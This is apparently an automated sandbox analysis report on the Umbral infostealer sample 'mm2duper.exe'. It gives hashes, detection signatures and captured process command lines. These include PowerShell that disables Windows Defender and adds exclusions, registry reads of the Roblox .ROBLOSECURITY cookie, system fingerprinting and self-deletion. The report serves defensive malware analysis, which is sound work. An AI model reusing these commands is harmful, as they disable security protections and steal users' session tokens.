Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
29-06-2024 00:44
Behavioral task
behavioral1
Sample
mm2duper.exe
Resource
win7-20240508-en
General
-
Target
mm2duper.exe
-
Size
229KB
-
MD5
65536dc4bcafc3ee3c1dcf7ed64c12df
-
SHA1
e1ca248ae2ef47a6b89ad6fb155f4d5ec3674e9c
-
SHA256
98e7e144b7bc45bd52601d093b1e447cf486bf2e8cd2ba84e8325e2d7b269662
-
SHA512
25f5043750e42d312b879dcb1b37bc4621790f7402befa21578818c8de6020f1983a984bde79eeaca60b3cd12654fe2dae6e728826e0c4da3794be3519d3bcc2
-
SSDEEP
6144:OwloZM3fsXtioRkts/cnnK6cMlkCanywvrY8hkijD6yBeb8e1mvpi:PoZ1tlRk83MlkCanywvrY8hkijD6yQiw
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2472-1-0x0000000000F20000-0x0000000000F60000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2624 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts mm2duper.exe -
Deletes itself 1 IoCs
pid Process 2124 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1248 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2804 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2472 mm2duper.exe 2624 powershell.exe 2800 powershell.exe 2620 powershell.exe 1580 powershell.exe 1684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2472 mm2duper.exe Token: SeIncreaseQuotaPrivilege 2336 wmic.exe Token: SeSecurityPrivilege 2336 wmic.exe Token: SeTakeOwnershipPrivilege 2336 wmic.exe Token: SeLoadDriverPrivilege 2336 wmic.exe Token: SeSystemProfilePrivilege 2336 wmic.exe Token: SeSystemtimePrivilege 2336 wmic.exe Token: SeProfSingleProcessPrivilege 2336 wmic.exe Token: SeIncBasePriorityPrivilege 2336 wmic.exe Token: SeCreatePagefilePrivilege 2336 wmic.exe Token: SeBackupPrivilege 2336 wmic.exe Token: SeRestorePrivilege 2336 wmic.exe Token: SeShutdownPrivilege 2336 wmic.exe Token: SeDebugPrivilege 2336 wmic.exe Token: SeSystemEnvironmentPrivilege 2336 wmic.exe Token: SeRemoteShutdownPrivilege 2336 wmic.exe Token: SeUndockPrivilege 2336 wmic.exe Token: SeManageVolumePrivilege 2336 wmic.exe Token: 33 2336 wmic.exe Token: 34 2336 wmic.exe Token: 35 2336 wmic.exe Token: SeIncreaseQuotaPrivilege 2336 wmic.exe Token: SeSecurityPrivilege 2336 wmic.exe Token: SeTakeOwnershipPrivilege 2336 wmic.exe Token: SeLoadDriverPrivilege 2336 wmic.exe Token: SeSystemProfilePrivilege 2336 wmic.exe Token: SeSystemtimePrivilege 2336 wmic.exe Token: SeProfSingleProcessPrivilege 2336 wmic.exe Token: SeIncBasePriorityPrivilege 2336 wmic.exe Token: SeCreatePagefilePrivilege 2336 wmic.exe Token: SeBackupPrivilege 2336 wmic.exe Token: SeRestorePrivilege 2336 wmic.exe Token: SeShutdownPrivilege 2336 wmic.exe Token: SeDebugPrivilege 2336 wmic.exe Token: SeSystemEnvironmentPrivilege 2336 wmic.exe Token: SeRemoteShutdownPrivilege 2336 wmic.exe Token: SeUndockPrivilege 2336 wmic.exe Token: SeManageVolumePrivilege 2336 wmic.exe Token: 33 2336 wmic.exe Token: 34 2336 wmic.exe Token: 35 2336 wmic.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeIncreaseQuotaPrivilege 1740 wmic.exe Token: SeSecurityPrivilege 1740 wmic.exe Token: SeTakeOwnershipPrivilege 1740 wmic.exe Token: SeLoadDriverPrivilege 1740 wmic.exe Token: SeSystemProfilePrivilege 1740 wmic.exe Token: SeSystemtimePrivilege 1740 wmic.exe Token: SeProfSingleProcessPrivilege 1740 wmic.exe Token: SeIncBasePriorityPrivilege 1740 wmic.exe Token: SeCreatePagefilePrivilege 1740 wmic.exe Token: SeBackupPrivilege 1740 wmic.exe Token: SeRestorePrivilege 1740 wmic.exe Token: SeShutdownPrivilege 1740 wmic.exe Token: SeDebugPrivilege 1740 wmic.exe Token: SeSystemEnvironmentPrivilege 1740 wmic.exe Token: SeRemoteShutdownPrivilege 1740 wmic.exe Token: SeUndockPrivilege 1740 wmic.exe Token: SeManageVolumePrivilege 1740 wmic.exe Token: 33 1740 wmic.exe Token: 34 1740 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2472 wrote to memory of 2336 2472 mm2duper.exe 28 PID 2472 wrote to memory of 2336 2472 mm2duper.exe 28 PID 2472 wrote to memory of 2336 2472 mm2duper.exe 28 PID 2472 wrote to memory of 2852 2472 mm2duper.exe 31 PID 2472 wrote to memory of 2852 2472 mm2duper.exe 31 PID 2472 wrote to memory of 2852 2472 mm2duper.exe 31 PID 2472 wrote to memory of 2624 2472 mm2duper.exe 33 PID 2472 wrote to memory of 2624 2472 mm2duper.exe 33 PID 2472 wrote to memory of 2624 2472 mm2duper.exe 33 PID 2472 wrote to memory of 2800 2472 mm2duper.exe 35 PID 2472 wrote to memory of 2800 2472 mm2duper.exe 35 PID 2472 wrote to memory of 2800 2472 mm2duper.exe 35 PID 2472 wrote to memory of 2620 2472 mm2duper.exe 37 PID 2472 wrote to memory of 2620 2472 mm2duper.exe 37 PID 2472 wrote to memory of 2620 2472 mm2duper.exe 37 PID 2472 wrote to memory of 1580 2472 mm2duper.exe 39 PID 2472 wrote to memory of 1580 2472 mm2duper.exe 39 PID 2472 wrote to memory of 1580 2472 mm2duper.exe 39 PID 2472 wrote to memory of 1740 2472 mm2duper.exe 41 PID 2472 wrote to memory of 1740 2472 mm2duper.exe 41 PID 2472 wrote to memory of 1740 2472 mm2duper.exe 41 PID 2472 wrote to memory of 308 2472 mm2duper.exe 43 PID 2472 wrote to memory of 308 2472 mm2duper.exe 43 PID 2472 wrote to memory of 308 2472 mm2duper.exe 43 PID 2472 wrote to memory of 1420 2472 mm2duper.exe 45 PID 2472 wrote to memory of 1420 2472 mm2duper.exe 45 PID 2472 wrote to memory of 1420 2472 mm2duper.exe 45 PID 2472 wrote to memory of 1684 2472 mm2duper.exe 47 PID 2472 wrote to memory of 1684 2472 mm2duper.exe 47 PID 2472 wrote to memory of 1684 2472 mm2duper.exe 47 PID 2472 wrote to memory of 1248 2472 mm2duper.exe 49 PID 2472 wrote to memory of 1248 2472 mm2duper.exe 49 PID 2472 wrote to memory of 1248 2472 mm2duper.exe 49 PID 2472 wrote to memory of 2124 2472 mm2duper.exe 51 PID 2472 wrote to memory of 2124 2472 mm2duper.exe 51 PID 2472 wrote to memory of 2124 2472 mm2duper.exe 51 PID 2124 wrote to memory of 2804 2124 cmd.exe 53 PID 2124 wrote to memory of 2804 2124 cmd.exe 53 PID 2124 wrote to memory of 2804 2124 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2852 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mm2duper.exe"C:\Users\Admin\AppData\Local\Temp\mm2duper.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\mm2duper.exe"2⤵
- Views/modifies file attributes
PID:2852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mm2duper.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:308
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1684
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1248
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\mm2duper.exe" && pause2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:2804
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a1b1e2ab3680f8bdd050084712576e89
SHA15f8d45c53022fad55c9ec20c92064fadf3c8386c
SHA256c4fca93ea4bbd2a50baddc6352ccc119bcca00dfd0ee5e1ba4a1606e378dce85
SHA512f12660f4773d94cde6303992db6e343521929466724c6e89d7a6188d9a2b9d2b6750ad4e3c915d2a7c5c3c8f8bb1cf535eee226524e4d9cb1d9786d755de0460